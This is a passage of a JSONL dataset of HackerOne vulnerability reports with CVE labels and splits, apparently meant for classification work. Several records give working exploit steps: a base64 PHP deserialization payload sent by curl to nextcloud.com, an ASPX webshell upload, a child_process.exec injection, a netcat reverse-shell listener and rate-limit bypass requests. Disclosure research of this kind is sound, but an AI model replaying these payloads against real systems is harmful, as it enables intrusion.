"label_source": "within_source_cve_index", "label": 1} -{"id": "55af3f24e50e437b4f44", "text": "[Business Logic Errors] CVE-2023-23914: HSTS ignored on multiple requests\n\ncurl's HSTS functionality fail when multiple URLs are requested serially.\n\nUsing its HSTS support, curl can be instructed to use HTTPS instead of using an insecure clear-text HTTP step even when HTTP is provided in the URL. This HSTS mechanism would however suprisingly be ignored by subsequent transfers when done on the same command line because the state would not be properly carried on.\n\n## Impact\n\nBypass intended security control.", "source": "hackerone", "timestamp": "2023-02-24", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "6fd95e183d6010bb1dc1", "text": "[Code Injection] [hta3] Remote Code Execution on https://███ via improper access control to SCORM Zip upload/import\n\n## Summary:\nThere is a Remote Code Execution vulnerability at https://█████████/Kview/CustomCodeBehind/base/courseware/scorm/management/scorm2004uploadcourse.aspx which allows any user to upload a SCORM course package. Furthermore, an attacker can add an ASPX shell to the SCORM package which will then get extracted onto the server, where the attacker can then execute commands.\n\n## Steps To Reproduce:\n\n 1. Visit `https://███████/` and log in with the credentials: `██████████`\n 2. Now download this \"malicious\" SCORM course package: █████\n 3. If you `unzip scorm.zip`, you will notice this is a valid SCORM [package](https://scorm.com/scorm-explained/technical-scorm/content-packaging/), and you will also notice that I've included an ASPX file in `shared/cdlcdlcdl.aspx` which runs the `whoami` command. Notice I also included that file reference in the Scorm Manifest (`imsmanifest.xml`)\n4. Visit https://████████/Kview/CustomCodeBehind/base/courseware/scorm/management/scorm2004uploadcourse.aspx, select the ██████ file. Start **intercepting** in Burp Suite Repeater. \n5. Forward the POST request to `/Kview/CustomCodeBehind/base/courseware/scorm/management/scorm2004uploadcourse.aspx`\n6. Now intercept the request to `/Kview/CustomCodeBehind/base/courseware/scorm/management/scorm2004editmetadata.aspx`\n7. Right-Click on it, Hover down to \"Do intercept\" and click \"response to this request\" then forward it. (In your web-browser you might be able to just right-click, inspect-element, and search for strCourseId in there but my browser was being funky).\n8. Once you've received the response, search for \"strCourseId\" and grab it.\n\nFor example, you would grab `F6BAC72B45D64B34ACB662BB001D8523` out of the following response:\n\n```html\nCourse Files\n```\n9. Now, visit `https://█████/CServer/Courseware//shared/cdlcdlcdl.aspx` and you will see the shell executes:\n\n███\n\n## Supporting Material/References:\n- https://█████/CServer/Courseware/F6BAC72B45D64B34ACB662BB001D8523/shared/cdlcdlcdl.aspx\n\n## Proof-of-Concept Video\n█████████\n\n## Impact\n\nCritical, an attacker can execute commands on this military server, steal sensitive information, pivot to internal systems, etc.\n\nBest,\n@cdcl", "source": "hackerone", "timestamp": "2022-09-15", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "5e7d06f759f65c046bfe", "text": "[Information Exposure Through Directory Listing] Information Exposure Through Directory Listing\n\n## Summary:\n\nDirectory listing is a web server function that displays the directory contents when there is no index file in a specific website directory. It is dangerous to leave this function turned on for the web server because it leads to information disclosure.\n\n## Steps To Reproduce:\n\nGo to this URL: http://35.156.91.137/grafana/logs/\nYou can see logs files\nhttp://35.156.91.137/grafana/logs/error.log\nhttp://35.156.91.137/grafana/logs/access.log\n\n## PoC:\n```\n88.244.90.152 - - [31/Jan/2022:11:53:19 +0000] \"GET /api/live/ws HTTP/1.1\" 400 3325 \"-\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\"\n165.225.95.75 - - [31/Jan/2022:11:53:20 +0000] \"GET /api/live/ws HTTP/1.1\" 400 3325 \"-\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36\"\n88.244.90.152 - - [31/Jan/2022:11:53:21 +0000] \"GET /api/live/ws HTTP/1.1\" 400 872 \"-\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\"\n```\n```\n[Sat Feb 05 01:49:35.862611 2022] [core:error] [pid 8186:tid 140028348987136] [client 161.35.86.181:47058] AH00126: Invalid URI in request GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts HTTP/1.1\n[Sat Feb 05 01:49:36.316927 2022] [authz_core:error] [pid 8186:tid 140027803723520] [client 161.35.86.181:47426] AH01630: client denied by server configuration: proxy:http://127.0.0.1:3000/server-status\n[Thu Feb 10 23:55:47.412015 2022] [ssl:error] [pid 11243:tid 140029020075776] [client 54.205.194.131:42490] AH02042: rejecting client initiated renegotiation\n[Fri Feb 11 06:50:00.503097 2022] [proxy:error] [pid 4547:tid 140029011683072] (111)Connection refused: AH00957: HTTP: attempt to connect to 127.0.0.1:3000 (127.0.0.1) failed\n```\n\n## Impact\n\nInformation Disclosure", "source": "hackerone", "timestamp": "2023-06-23", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "22d3e709504dd81ff4a7", "text": "[Unknown] Electron CVE-2022-35954 Delimiter Injection Vulnerability in exportVariable\n\n## Describe the summary:\nThe Electron Website provides a set of packages to make creating actions easier. The `core.exportVariable` function uses a well known delimiter that attackers can use to break out of that specific variable and assign values to other arbitrary variables. Workflows that write untrusted values to the `GITHUB_ENV` file may cause the path or other environment variables to be modified without the intention of the workflow or action author. Users should upgrade to `@actions/core v1.9.1`. If you are unable to upgrade the `@actions/core` package, you can modify your action to ensure that any user input does not contain the delimiter `_GitHubActionsFileCommandDelimeter_` before calling `core.exportVariable`.\n\n## Impact\n\n[CVE-2022-35954](https://afaghhosting.net/blog/cve-2022-35954/)\nCWE-74\nCWE-77\nCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N", "source": "hackerone", "timestamp": "2022-12-14", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "4c7e8a6257bbfebf7529", "text": "[Code Injection] Synthetics Recorder: Code injection when recording website with malicious content\n\n## Summary\n\nHello team! Synthetics recorder has a `quote` function to escape user-controlled input, but in one particular scenario the escaping isn't enough and a malicious website can inject arbitrary code in the recorder session.\n\n## Description\n\nThe `waitForNavigation` event calls `quote` within the context of a multi-line comment (`/* ... */`) so we can break out of that without using the escaped characters ([reference](https://github.com/elastic/synthetics-recorder/blob/v0.0.1-beta.3/electron/syntheticsGenerator.ts#L217=))\n\nIn a normal situation the code generated looks like this for a navigation event to `https://example.com`\n\n```javascript\n page.waitForNavigation(/*{ url: 'https://example.com' }*/),\n```\n\nbut it's possible to escape out of the comment without using single quotes (which would be escaped) with a specially crafted URL like `https://example.com?q=*/require(`child_process`).exec(`touch$IFS/tmp/haxx`)/*`\n\n```javascript\n page.waitForNavigation(/*{ url: 'https://example.com?q=*/require(`child_process`).exec(`touch$IFS/tmp/dee-see`)/*' }*/),\n```\n\nThe syntax highlighting here on HackerOne helps visualizing how that works. `$IFS` is used because spaces get encoded to `%20`.\n\nIt's possible to have code execution when the victim uses the `test` feature inside of the synthetic recorder but the code we're allowed to use is fairly limited because the `require` function isn't available. The maximum impact is when the user saves the recorded session as a project and executes it using the synthetic runner.\n\n## Steps To Reproduce\n\n### Preparation\n\nInstall the synthetics recorder (See https://github.com/elastic/synthetics-recorder/, I'm following the instructions to run it in development mode (`nvm install; nvm use; npm install; npm run dev`) but you could also download the binary on the releases page)\n\n### Reproduction\n\n1. Start Synthetics Recorder and enter `http://deesee.xyz:4567` in the text box where it says \"Enter a Starting URL\"\n1. Click \"Start Recording\"\n1. A browser has opened, this website is a modified clone of my blog. Click the GitLab icon in the top right\n\n {F1820934}\n\n1. Close the browser window\n\n In a normal Synthetics Recorder session there would be much more steps to record but here we only did what's necessary to trigger the issue.\n\n1. Click the \"Export\" button and you'll see this code\n\n ```javascript\n step('Go to http://deesee.xyz:4567/', async () => {\n await page.goto('http://deesee.xyz:4567/');\n await Promise.all([\n page.waitForNavigation(/*{ url: 'https://gitlab.com/dee-see?query=*/require(`child_process`).exec(`touch$IFS/tmp/dee-see`)/*' }*/),\n page.click('[aria-label=\"GitLab\"] svg')\n ]);\n });\n ```\n\n We can see the payload is in place. It's fairly obvious because we only recorded one step, but in a long recording session it would be buried deeper.\n\n1. Click the \"Export\" button and save the file in a directory\n1. In that directory run `npm init -y; npm install @elastic/synthetics; npx @elastic/synthetics .`\n1. When the tests finished running observe that the `touch /tmp/dee-see` command ran\n\nThose last steps seem contrived, but that's how a synthetics test suite is setup and how a developer would make sure the session they just recorded would be integrated into their builds and whatnot.\n\n## Supporting Material/References:\n\n{F1820942}\n\n## CVSS\n\nConfidentiality and Integrity impact are High because of the arbitrary command execution. I also included Availability impact because those commands can shut down the system. I will concede though that Attack Complexity could be \"very high\" if that existed on the Attack Complexity scale. :)\n\n## Impact\n\nSomeone with control over the website's content can run arbitrary code where ever the synthetics recorded session will be re-executed.\n\nDeveloper computers and CI systems come to mind. The most realistic attack scenario would be privilege escalation from within a company.", "source": "hackerone", "timestamp": "2023-04-08", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "3b49fda63a2f0399aa9a", "text": "[Unrestricted Upload of File with Dangerous Type] [Kafka Connect] [JdbcSinkConnector][HttpSinkConnector] RCE by leveraging file upload via SQLite JDBC driver and SSRF to internal Jolokia\n\n## Summary:\nThe Aiven JDBC sink includes the SQLite JDBC Driver. This JDBC driver can be used to upload SQLite database files onto the server. The HTTP sink connector allows sending HTTP requests to localhost. There is unprotected Jolokia listening on `localhost:6725`. JMX exports the `com.sun.management:type=DiagnosticCommand` MBean, which contains the `jvmtiAgentLoad` operation. This operation can be used to execute the SQLite database as JVM Agent by embedding the JVM Agent JAR file inside the SQLite database as an BLOB field in a table.\n\n## Steps To Reproduce:\n\n{F1703051}\n\n 1. Login into my VPS: `ssh ████`, password: `█████████@`\n 1. Execute `nc -nlvp 4446`\n 1. cd to `jdbc-sqlite-jolokia-rce` and run `python3 poc.py` (if running locally, install kafka-python using pip first).\n 1. Reverse shell connection should now be established to my test instance\n\n## Impact\n\nRCE on the Kafka Connect server", "source": "hackerone", "timestamp": "2022-11-08", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "385f31fb0b33f42553ff", "text": "[Insecure Storage of Sensitive Information] All user password hash can be seen from admin panel\n\n# Summary:\nDuring my primary research I found that `api/users?page=1&userId=&firstName=test&lastName=&email=&partnerOrg=&highSchool=` this endpoint gives hashed password of all users.\n\n# Steps To Reproduce:\n+ Login to Admin and go to Admin--> Search Users.\n+ We see a request like this was send and in response we get the hashed password of all the users.\n\n{F1630381}\n\n##HTTP Request:\n\n```\nGET /api/users?page=1&userId=&firstName=test&lastName=&email=&partnerOrg=&highSchool= HTTP/2\nHost: hackers.upchieve.org\nCookie: connect.sid=s%3AaF9AzSGty6cZOHNTyahImdIzUoSDCWuB.ofJzU1Tr25W2Kd2unMFlpS66K4VsPtK3YE0xmHvUZGU; _gcl_au=1.1.2044852401.1644683211; _ga=GA1.2.1811282066.1644683221; _csrf=whFQZop0bR6xQh6KtmNQLBfS; __cf_bm=2KDOr5.OqRrhRkG3HhcUs0vp57z5O6ajxpDfiZBVfGA-1645624338-0-AU9Yc7GzGOeS+GILwGKIEWzbToj/4SEhBw5wog9uHW0rWkomQxhuC756xXzHVx5vQZWpm8qGUUNBPxFB6cvtTQ9BfzCJWA5Zq9jDYP3Z9p+Olw+qCSjBa/rjulVDF51Kjg==; io=zIQg9SCEJ_ZblHVdAAAy; _gid=GA1.2.1980510602.1645624337; ph_bogus_posthog=%7B%22distinct_id%22%3A%22619ea2c8488636001138121f%22%2C%22%24device_id%22%3A%2217eeec24dba290-06a553129ffb21-4c3e227d-1fa400-17eeec24dbb903%22%2C%22%24user_id%22%3A%22619ea2c8488636001138121f%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22%24referrer%22%3A%22%24direct%22%2C%22%24referring_domain%22%3A%22%24direct%22%2C%22%24session_recording_enabled%22%3Afalse%7D\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nNewrelic: eyJ2IjpbMCwxXSwiZCI6eyJ0eSI6IkJyb3dzZXIiLCJhYyI6IjI2NzQ5NzQiLCJhcCI6IjQyOTE2Mzc1MCIsImlkIjoiNzFhMzgxOGNjZDQ2OGNkYyIsInRyIjoiYjBiM2Q0YTI3N2NjZDZmODBmOWU2NWIwODBlY2U1NDAiLCJ0aSI6MTY0NTYyNTExMDY0N319\nTraceparent: 00-b0b3d4a277ccd6f80f9e65b080ece540-71a3818ccd468cdc-01\nTracestate: 2674974@nr=0-1-2674974-429163750-71a3818ccd468cdc----1645625110647\nX-Csrf-Token: KeypPQND-ch0LQMIPkTckMoZdYHTBgA4Mha0\nX-Requested-With: XMLHttpRequest\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n```\n\n## Impact\n\nChances that weak passwords can be cracked and people might have same passwords for email and other places.", "source": "hackerone", "timestamp": "2022-06-11", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "d33d9dc61ee516e71e3e", "text": "[Improper Access Control - Generic] Missing rate limiting on password reset functionality allows to send lot of emails\n\nOn next cloud after signing up\nYou can reset your password here : https://support.nextcloud.com/#password_reset\nThe mail you will get will redirect you to a website named Wokli.\nAnd there you can also reset password using : https://ppp.woelkli.com/login\n\nHere you can bypass the rate limit using IP rotate extension of burp suite.\n\nSteps to reproduce:\n 1. Go to https://ppp.woelkli.com/login\n2. Enter your mail and click on reset password and intercept the request. The request will be something like this \n\nPOST /lostpassword/email HTTP/2\nHost: ppp.woelkli.com\nCookie: __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; oc_sessionPassphrase=YbNqNZBiBLj69oHQyf2o9Kcd9jlMXTrBm1Wv0xyF7aY4VI6t%2FTizoufLy8m0lU%2BHZ%2F0mCRK%2FC6VSZYjmztLv%2FQfYbjZxKVA0GtwP2q80D744o7CztCkWEtjQpvBK7jtX; ock6rp1oyjad=44hbnjo8uc6jjih95vtvie80kc\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/json;charset=utf-8\nRequesttoken: elTOLCp7a4nWX2tjz/8iSI1fDGEd8Qfqi5GpX/RNPlM=:LX++HX0TDvGabxMXp4taJ9cUVSlvq2XTvaTlHrUOByk=\nContent-Length: 30\nOrigin: https://ppp.woelkli.com\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n\n{\"user\":\"yougovxxx@gmail.com\"}\n\n3. Now send the request to repeater and try to resend it . After 7 to 8 tries it will give a rate limit and a response code of 429.\n4. To bypass it login to your IP rotate and send the above request to intruder and and turn ON IP rotate and set the intruder to null payloads.\n5. You will get lots of emails of reset password.\n\n\nSolution: \nI Will Recommend You To Add A ReCaptcha & Sort Of Something Which Requires Manual Human Interaction To Proceed Like You Can Add Captcha Like 2+2=___ so that it cannot be brute forced and you also can have a limit at the backend for particular number upto 5 times a day user can request Forget Password Email or Link something like that will prevent you from someone exploiting this vulnerability\n\n## Impact\n\nIf You Are Using Any Email Service Software API Or Some Tool Which Costs You For Your Email This Type Of Attack Can Result You In Financial Lose And It Can Also Slow Down Your Services It Can Take Bulk Of Storage In Sent Mail Although If Users Are Affected By This Vulnerability They Can Stop Using Your Services Which Can Lead To Business Risk", "source": "hackerone", "timestamp": "2023-03-05", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "eb46aaeca54ede608453", "text": "[Deserialization of Untrusted Data] RCE on Wordpress website\n\nThere is a trivial to exploit Remote Code Execution on nextcloud.com due to unserializing user input.\n\n# Proof of concept\nThe following command will execute the `system('id')` command on the host. As gadget chain I've used Monolog which is included in the PodLove WordPress plugin used on nextcloud.com: \n\n```\ncurl -i -s -k -X $'GET' \\\n -H $'Host: nextcloud.com' \\\n -b $'nc_cookie_banner={\\\"essentials\\\":true,\\\"convenience\\\":false,\\\"statistics\\\":{\\\"matomo\\\":false},\\\"external_media\\\":{\\\"youtube\\\":false,\\\"vimeo\\\":false}}; wp-wpml_current_language=en; nc_form_fields=TzozNzoiTW9ub2xvZ1xIYW5kbGVyXEZpbmdlcnNDcm9zc2VkSGFuZGxlciI6NDp7czoxNjoiACoAcGFzc3RocnVMZXZlbCI7aTowO3M6MTA6IgAqAGhhbmRsZXIiO3I6MTtzOjk6IgAqAGJ1ZmZlciI7YToxOntpOjA7YToyOntpOjA7czoyOiJpZCI7czo1OiJsZXZlbCI7aToxMDA7fX1zOjEzOiIAKgBwcm9jZXNzb3JzIjthOjI6e2k6MDtzOjM6InBvcyI7aToxO3M6Njoic3lzdGVtIjt9fQ==' \\\n $'https://nextcloud.com/newsletter/'\n```\n\nThe last line of the response will contain the output of the `id` command:\n```\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n```\n\n# Vulnerable lines of code\nThe `unserialize` call in the below code paths is performed on user-input. (`$_COOKIE['nc_form_fields']`)\n\nhttps://github.com/nextcloud/nextcloud-theme/blob/e6db0a90391ec94f9eb6d86e16dc16e36c5f4dd4/inc/ninjaforms.php#L114\n```php\nadd_filter( 'ninja_forms_render_default_value', 'nc_change_nf_default_value', 10, 3 );\nfunction nc_change_nf_default_value( $default_value, $field_type, $field_settings ) {\n \n if(isset($_COOKIE['nc_form_fields'])){\n $nc_form_fields = unserialize(base64_decode($_COOKIE['nc_form_fields']));\n\n if( str_contains($field_settings['key'], 'name') && !str_contains($field_settings['key'], 'organization') ){\n if(isset($nc_form_fields['nc_form_name'])) {\n $default_value = $nc_form_fields['nc_form_name'];\n }\n }\n if( str_contains($field_settings['key'], 'email') ){\n if(isset($nc_form_fields['nc_form_email'])) {\n $default_value = $nc_form_fields['nc_form_email'];\n }\n }\n if( str_contains($field_settings['key'], 'phone') ){\n if(isset($nc_form_fields['nc_form_phone'])) {\n $default_value = $nc_form_fields['nc_form_phone'];\n }\n }\n }\n\n return $default_value;\n}\n```\n\nhttps://github.com/nextcloud/nextcloud-theme/blob/e6db0a90391ec94f9eb6d86e16dc16e36c5f4dd4/inc/ninjaforms.php#L431\n```php\nadd_filter( 'ninja_forms_render_options', function( $options, $settings ) {\n \n //https://www.html-code-generator.com/php/array/languages-name-and-code\n $languages_list = array(\n 'en' => 'English',\n // [snip]\n 'zu' => 'Zulu - isiZulu'\n );\n\n if(str_contains($settings['key'], 'language')) {\n\n $options = [];\n $browser_lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);\n\n $pref_lang = '';\n if(isset($_COOKIE['nc_form_fields'])){\n $nc_form_fields = unserialize(base64_decode($_COOKIE['nc_form_fields']));\n if( isset($nc_form_fields['nc_form_lang'])){\n $pref_lang = $nc_form_fields['nc_form_lang'];\n }\n } else {\n $pref_lang = $browser_lang;\n }\n\n\n foreach($languages_list as $code => $language) {\n $selected = false;\n\n if($pref_lang == $code){\n $selected = true;\n }\n\n $options[] = [\n 'label' => $language,\n 'value' => $code,\n 'calc' => 0,\n 'selected' => $selected\n ];\n\n }\n \n }\n \n return $options;\n}, 10, 2 );\n```\n\n## Impact\n\nRCE on the nextcloud.com WordPress instance. I have not tried to escalate up from the host, but I'd assume there is plenty of privilege escalation potential. (or at least the ", "source": "hackerone", "timestamp": "2023-12-28", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "b1b067f2a9f357fa5c1a", "text": "[Information Disclosure] insecure gitlab repositories at ████████ [HtUS]\n\n**If you click the link https://███, you're redirected to https://██████/users/sign_in, where credentials have to be inserted. \nThe repositories are private and shouldn't be accessable for unauthenticated users!**\n\n### POC\n\n* If you click the following links https://████/api/v4/projects, information about internal projects and users is leaked\n\n* I just take projectid: 4667 as an example for the information disclosure\n```\n{\"id\":4667,\"description\":\"This Network-graph based literature review tool uses the open-source version of Neo4j (https://neo4j.com/) with Jupyter Notebooks written in Python to import academic literature metadata from a variety of sources. \\r\\n\",\"name\":\"Graph-Based Literature Review Tool\",\"name_with_namespace\":\"Senft, Michael / Graph-Based Literature Review Tool\",\"path\":\"graph-based-literature-review-tool\",\"path_with_namespace\":\"██████████/graph-based-literature-review-tool\",\"created_at\":\"2021-10-19T12:47:16.550-07:00\",\"default_branch\":\"master\",\"tag_list\":[],\"topics\":[],\"ssh_url_to_repo\":\"git@██████:████/graph-based-literature-review-tool.git\",\"http_url_to_repo\":\"https://████████/███████/graph-based-literature-review-tool.git\",\"web_url\":\"https://████████/████████/graph-based-literature-review-tool\",\"readme_url\":\"https://███/███/graph-based-literature-review-tool/-/blob/master/README.md\",\"avatar_url\":\"https://████/uploads/-/system/project/avatar/4667/SchemaModel.jpg\",\"forks_count\":0,\"star_count\":1,\"last_activity_at\":\"2022-01-31T08:48:54.473-08:00\",\"namespace\":{\"id\":1306,\"name\":\"Senft, Michael\",\"path\":\"██████████\",\"kind\":\"user\",\"full_path\":\"██████\",\"parent_id\":null,\"avatar_url\":\"/uploads/-/system/user/avatar/1117/avatar.png\",\"web_url\":\"https://███/████████\"}}\n```\n\n* The source-code is accessable/readable: \nhttps://██████████/████/graph-based-literature-review-tool\nhttps://█████/███████/graph-based-literature-review-tool/-/blob/master/README.md \n\n* It can be cloned \n```\ngit clone https://███/██████████/graph-based-literature-review-tool.git\nCloning into 'graph-based-literature-review-tool'...\nremote: Enumerating objects: 198, done.\nremote: Counting objects: 100% (68/68), done.\nremote: Compressing objects: 100% (31/31), done.\nremote: Total 198 (delta 41), reused 64 (delta 37), pack-reused 130\nReceiving objects: 100% (198/198), 239.72 KiB | 503.00 KiB/s, done.\nResolving deltas: 100% (109/109), done.\n```\n\n## Impact\n\nA potential attacker has full access to user information and to the users source-code", "source": "hackerone", "timestamp": "2022-09-27", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "70e128aef71abbdb7d1b", "text": "[Information Disclosure] [█████████] Information disclosure due unauthenticated access to APIs and system browser functions\n\n**Description:**\nMultiple information exposure vulnerabilites were identified in a Jira Server instance (unauthenticated access to APIs and system browser functions). This report describes a combination of two separate vulnerabilities in two separate services This chain of vulnerabilities allows unauthenticated attacker to run arbitrary code on a server inside the company's internal network. the vulnerable registered as references JRASERVER-73060\n\n\n## References\nhttps://jira.atlassian.com/browse/JRASERVER-73060\nhttps://nvd.nist.gov/vuln/detail/CVE-2020-14179\n\n## Impact\n\nUnauthorised access and the data should not be visible.\nProject categories, resolutions, and usernames are listed even if the API is not authenticated\n\n## System Host(s)\n███████\n\n## Affected Product(s) and Version(s)\n██████████\n\n## CVE Numbers\nCVE-2020-14179\n\n## Steps to Reproduce\n## Steps to Reproduce\n1. Navigate visit the target scope is https://██████████/secure/JiraCreditsPage!default.jspa\n 1. And now we found a directory is jira sensitive\n 1. Lets send a curl request to the `?maxResults=1000` endpoint, as shown below. In the request, point the post request to the server address you want to send the request to:\n\nHere's the HTTP Parameter request that the issue:\n```\nGET /rest/menu/latest/admin HTTP/1.1\nHost: ██████████\nConnection: keep-alive\nPragma: no-cache\nCache-Control: no-cache\nsec-ch-ua-platform: \"Mac OS\"\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\n```\n * https://████/secure/JiraCreditsPage!default.jspa\n * https://█████████/rest/menu/latest/admin?maxResults=1000\n\n## Suggested Mitigation/Remediation Actions\n## Suggested Mitigation/Remediation Actions\nAnonymous access to endpoints listed below is restricted starting Jira 9.0. On future Jira 8.x releases and all LTS releases it is possible to restrict anonymous access with feature flags. On Jira 8.x to restrict anonymous access to the endpoint you need to disable feature flag aka provide ``.disabled On Jira 9.0 you need to enable the same feature flag aka provide ``.enabled\n\n\n**You can use given feature flags: **\n`/rest/api/2/projectCategory` - (Anonymous access disabled completely) \n`/rest/api/2/resolution` - (Anonymous access blocked only when there is no projects available for anonymous users) \n`/rest/menu/latest/admin` - There is currently no feature flag to disable anonymous access, please check linked ticket in \"duplicates by\" to track this problem.\n\n**Refferences**\nhttps://hackerone.com/reports/994612 \n[JRASERVER-73060](https://jira.atlassian.com/browse/JRASERVER-73060)", "source": "hackerone", "timestamp": "2023-09-29", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "49cc3c6b1fed53eabdbc", "text": "[Violation of Secure Design Principles] Password reset token leak via \"Host header\" on third party website\n\nHi Security Team,\n\n#Product / URL\nhttps://your-store.wholesale.shopifyapps.com/\n\n#Description\nIt has been identified that the application is leaking Token to third party sites. In this case it was found that the Token is being leaked to third party sites which is a issue knowing the fact that it can allow any malicious users to use the reset password of user.\n\n\n#Reproduction Instructions /\n1) Send reset password link to your email address.\n2)Now go to email, turn burp suite intercept on and click on reset password link. Check for the requests having the token in \"host\" as third party website. And copy the link\n3)Now turn intercept off and reset the password.(with that link)\n4)Now reset the password.\n\n#Proof of Concept\nF1180911\n\n#Additional Information:\nNote also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.\n\n## Impact\n\nAs you can see in the `Host` the reset token is getting leaked to third party sites. So, the person who has the complete control over that particular third party site can Use the Token easily.", "source": "hackerone", "timestamp": "2022-02-10", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "cd0fae3ed25ad8c0c9a7", "text": "OpenBMCS 2.4 Unauthenticated SSRF / RFI\n\nSeverity: high", "source": "zeroscience", "timestamp": "2022-01-16", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "74fb185453b340f86dcd", "text": "[Cross-site Scripting (XSS) - Stored] Stored XSS on wordpress.com\n\n## Summary:\n\nHi team\n\nI found Stored XSS in wordpress.com via app.crowdsignal.com\n\n\n## Platform(s) Affected:\n wordpress.com\n\n## Steps To Reproduce:\n1 . Go to https://app.crowdsignal.com/dashboard and create a poll\n2 . Put the payload as answer \n3. Go to Share Your Poll and Copy the Website Popup\n4.Go to https://wordpress.com/posts add new post\n5. App Website Popup \n6. Save it\n7.Open the page and the XSS will fired\n\n█████████\n\n## Impact\n\nThe attacker can use this issue to execute malicious script code in the victim user browser also redirect the victim user to malicious sites", "source": "hackerone", "timestamp": "2023-05-19", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "376773f102cb33915902", "text": "[Cross-Site Request Forgery (CSRF)] CSRF - Modify User Settings with one click - Account TakeOver\n\n**Target Url**\nhttps://█████\n\n**Summary:**\nThis CSRF is sensitive, similar to the old one #799855 , here attacker can change user name, email, and password with just one click from user.\nI think its severity should be greater than Medium (High) since it doesn't require any user interaction but only just being authenticated to the target url.\n\n## Step-by-step Reproduction Instructions\n\n1. Login to your account.\n2. To generate the html code: You can click on save button in edit Profile section and intercept the request -> Engagement Tools -> Generate CSRF PoC.\n3. Copy and paste the generated code to html file \n```\n\n \n
    \n \n \n \n \n \n
    \n \n\n```\nOpen the file in browser, click the button and the profile info will be changed successfully.\n\n## Suggested Mitigation/Remediation Actions\nAdd a csrf-token in the header or in an hidden input to check if the user that is doing this action authorized or not.\n\n## Impact\n\nThis action is critical and sensitive. Attacker can upload this file to a url. Sends it to the victims. And when the authenticated victims navigate to the url their accounts details (username, email, password) will change.\nAttacker will undergo successful Account Takeover.", "source": "hackerone", "timestamp": "2022-03-18", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "cff95c9d7c4bc112315a", "text": "[Business Logic Errors] Ability to use premium templates as free user via https://stripo.email/templates/?utm_source=viewstripo&utm_medium=referral\n\n## Summary:\nHello, I found security vulnerability in your web application, another business logic.\n\n## Steps To Reproduce\n 1. Go to https://stripo.email/templates/?utm_source=viewstripo&utm_medium=referral\n 2. Choose any premium template and click ```use in editor```\n 3. Then sign in to save and it is in your templates\n\n## Supporting Material/References:\nDown there is video showing everything\n\n * [attachment / reference]\n\n## Impact\n\nLose of business", "source": "hackerone", "timestamp": "2022-03-30", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "8176f04deca012917dcf", "text": "[Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)] HTML INJECTION on coins.state.gov\n\n##Summary \n\nHi team i hope you are well t is a pleasure to work in your program. I will begin to present the vulnerability that I found it: An html injection on coins.state.gov\n\n\n##Steps\n\n\n Vulnerable Link :\n```\n1.https://coins.state.gov/Errors.aspx?aspxerrorpath=Gxss\n```\n\n***Steps to reproduce ***\n\n###first step :\n 1. i used gxss and katana like tools to find vulnerable domain : https://coins.state.gov/Errors.aspx?aspxerrorpath=Gxss\n 2. i tried to xss but no result for now i tried it manually but no result.\n\n\n###second step :\n 1.i had an idea to use dalfox tool to try xss or html injection.\n 2. it work only for html injection \n 3. a video below can help you to see the result\n 4. when i refresh the browser and i keep dalfox run there is another payload generated on the page\n\n```bash\necho https://coins.state.gov/Errors.aspx?aspxerrorpath=Gxss | dalfox pipe\n```\n\n{F2135442}\n{F2135443}\n\n## Impact\n\nIt can allow an attacker to modify the page. To steal another person's identity. The attacker discovers injection vulnerability and decides to use an HTML injection attack. Attacker crafts malicious links, including his injected HTML content, and sends it to a user via email", "source": "hackerone", "timestamp": "2023-04-26", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "dcd8e0ac8e790dc76ee5", "text": "[Cross-site Scripting (XSS) - Generic] Incomplete fix for CVE-2022-32209 (XSS in Rails::Html::Sanitizer under certain configurations)\n\nWhile building a PoC for CVE-2022-32209, I noticed that I could not fix my vulnerable application by updating https://github.com/rails/rails-html-sanitizer from 1.4.2 